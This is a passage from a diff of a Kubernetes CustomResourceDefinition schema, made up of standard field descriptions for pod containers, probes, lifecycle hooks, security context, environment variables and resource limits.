successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: Resources are not allowed for ephemeral containers. Ephemeral containers use spare resources already allocated to the pod. + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum amount of compute resources required. If Requests is omitted for a container, it defaults to Limits if that is explicitly specified, otherwise to an implementation-defined value. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'Optional: SecurityContext defines the security options the ephemeral container should be run with. If set, the fields of SecurityContext override the equivalent fields of PodSecurityContext.' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls whether a process can gain more privileges than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is: 1) run as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false. + type: boolean + procMount: + description: procMount denotes the type of proc mount to use for the containers. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. This requires the ProcMountType feature flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + level: + description: Level is SELinux level label that applies to the container. + type: string + role: + description: Role is a SELinux role label that applies to the container. + type: string + type: + description: Type is a SELinux type label that applies to the container. + type: string + user: + description: User is a SELinux user label that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this container. If seccomp options are provided at both the pod & container level, the container options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates a profile defined in a file on the node should be used. The profile must be preconfigured on the node to work. Must be a descending path, relative to the kubelet's configured seccomp profile location. Must only be set if type is "Localhost". + type: string + type: + description: "type indicates which kind of seccomp profile will be applied. Valid options are: \n Localhost - a profile defined in a file on the node should be used. RuntimeDefault - the container runtime default profile should be used. Unconfined - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a container should be run as a 'Host Process' container. This field is alpha-level and will only be honored by components that enable the WindowsHostProcessContainers feature flag. Setting this field without the feature flag will result in errors when validating the Pod. All of a Pod's containers must have the same effective HostProcess value (it is not allowed to have a mix of HostProcess containers and non-HostProcess containers). In addition, if HostProcess is true then HostNetwork must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: string + type: object + type: object + startupProbe: + description: Probes are not allowed for ephemeral containers. + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should close the stdin channel after it has been opened by a single attach. When stdin is true the stdin stream will remain open across multiple attach sessions. If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container processes that reads from stdin will never receive an EOF. Default is false + type: boolean + targetContainerName: + description: If set, the name of the container from PodSpec that this ephemeral container targets. The ephemeral container will be run in the namespaces (IPC, PID, etc) of this container. If not set then the ephemeral container is run in whatever namespaces are shared for the pod. Note that the container runtime must support this feature. + type: string + terminationMessagePath: + description: 'Optional: Path at which the file to which the container''s termination message will be written is mounted into the container''s filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message should be populated. File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block devices to be used by the container. + items: + description: volumeDevice describes a mapping of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside of the container that the device will be mapped to. + type: string + name: + description: name must match the name of a persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting of a Volume within a container. + properties: + mountPath: + description: Path within the container at which the volume should be mounted. Must not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how mounts are propagated from the host to container and the other way around. When not set, MountPropagationNone is used. This field is beta in 1.10. + type: string + name: + description: This must match the Name of a Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false. + type: boolean + subPath: + description: Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. + type: string + required: + - name + type: object + type: array + hostAliases: + description: HostAliases is an optional list of hosts and IPs that will be injected into the pod's hosts file if specified. This is only valid for non-hostNetwork pods. + items: + description: HostAlias holds the mapping between IP and hostnames that will be injected as an entry in the pod's hosts file. + properties: + hostnames: + description: Hostnames for the above IP address. + items: + type: string + type: array + ip: + description: IP address of the host file entry. + type: string + type: object + type: array + hostIPC: + description: 'Use the host''s ipc namespace. Optional: Default to false.' + type: boolean + hostNetwork: + description: Host networking requested for this pod. Use the host's network namespace. If this option is set, the ports that will be used must be specified. Default to false. + type: boolean + hostPID: + description: 'Use the host''s pid namespace. Optional: Default to false.' + type: boolean + hostname: + description: Specifies the hostname of the Pod If not specified, the pod's hostname will be set to a system-defined value. + type: string + imagePullSecrets: + description: 'ImagePullSecrets is an optional list of references to secrets in the same namespace to use for pulling any of the images used by this PodSpec. If specified, these secrets will be passed to individual puller implementations for them to use. For example, in the case of docker, only DockerConfig type secrets are honored. More info: https://kubernetes.io/docs/concepts/containers/images#specifying-imagepullsecrets-on-a-pod' + items: + description: LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + type: array + initContainers: + description: 'List of initialization containers belonging to the pod. Init containers are executed in order prior to containers being started. If any init container fails, the pod is considered to have failed and is handled according to its restartPolicy. The name for an init container or normal container must be unique among all containers. Init containers may not have Lifecycle actions, Readiness probes, Liveness probes, or Startup probes. The resourceRequirements of an init container are taken into account during scheduling by finding the highest request/limit for each resource type, and then using the max of of that value or the sum of the normal containers. Limits are applied to init containers in a similar fashion. Init containers cannot currently be added or removed. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/' + items: + description: A single application container that you want to run within a pod. + properties: + args: + description: 'Arguments to the entrypoint. The docker image''s CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within a shell. The docker image''s ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set in the container. Cannot be updated. + items: + description: EnvVar represents an environment variable present in a Container. + properties: + name: + description: Name of the environment variable. Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) are expanded using the previously defined environment variables in the container and any service environment variables. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: supports metadata.name, metadata.namespace, `metadata.labels['''']`, `metadata.annotations['''']`, spec.nodeName, spec.serviceAccountName, status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, limits.ephemeral-storage, requests.cpu, requests.memory and requests.ephemeral-storage) are currently supported.' + properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret in the pod's namespace + properties: + key: + description: The key of the secret to select from. Must be a valid secret key. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. + items: + description: EnvFromSource represents the source of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend to each key in the ConfigMap. Must be a C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images This field is optional to allow higher level config management to default or override container images in workload controllers like Deployments and StatefulSets.' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Actions that the management system should take in response to container lifecycle events. Cannot be updated. + properties: + postStart: + description: 'PostStart is called immediately after a container is created. If the handler fails, the container is terminated and restarted according to its restart policy. Other management of the container blocks until the hook completes. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately before a container is terminated due to an API request or management event such as liveness/startup probe failure, preemption, resource contention, etc. The handler is not called if the container crashes or exits. The reason for termination is passed to the handler. The Pod''s termination grace period countdown begins before the PreStop hooked is executed. Regardless of the outcome of the handler, the container will eventually terminate within the Pod''s termination grace period. Other management of the container blocks until the hook completes or until the termination grace period is reached. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: 'Periodic probe of container liveness. Container will be restarted if the probe fails. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the container specified as a DNS_LABEL. Each container in a pod must have a unique name (DNS_LABEL). Cannot be updated. + type: string + ports: + description: List of ports to expose from the container. Exposing a port here gives the system additional information about the network connections a container uses, but is primarily informational. Not specifying a port here DOES NOT prevent that port from being exposed. Any port which is listening on the default "0.0.0.0" address inside a container will be accessible from the network. Cannot be updated. + items: + description: ContainerPort represents a network port in a single container. + properties: + containerPort: + description: Number of port to expose on the pod's IP address. This must be a valid port number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external port to. + type: string + hostPort: + description: Number of port to expose on the host. If specified, this must be a valid port number, 0 < x < 65536. If HostNetwork is specified, this must match ContainerPort. Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an IANA_SVC_NAME and unique within the pod. Each named port in a pod must have a unique name. Name for the port that can be referred to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, TCP, or SCTP. Defaults to "TCP". + type: string + required: + - containerPort + type: object + type: array + x-kubernetes-list-map-keys: + - containerPort + - protocol + x-kubernetes-list-type: map + readinessProbe: + description: 'Periodic probe of container service readiness. Container will be removed from service endpoints if the probe fails. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: 'Compute Resources required by this container. Cannot be updated. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum amount of compute resources required. If Requests is omitted for a container, it defaults to Limits if that is explicitly specified, otherwise to an implementation-defined value. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: 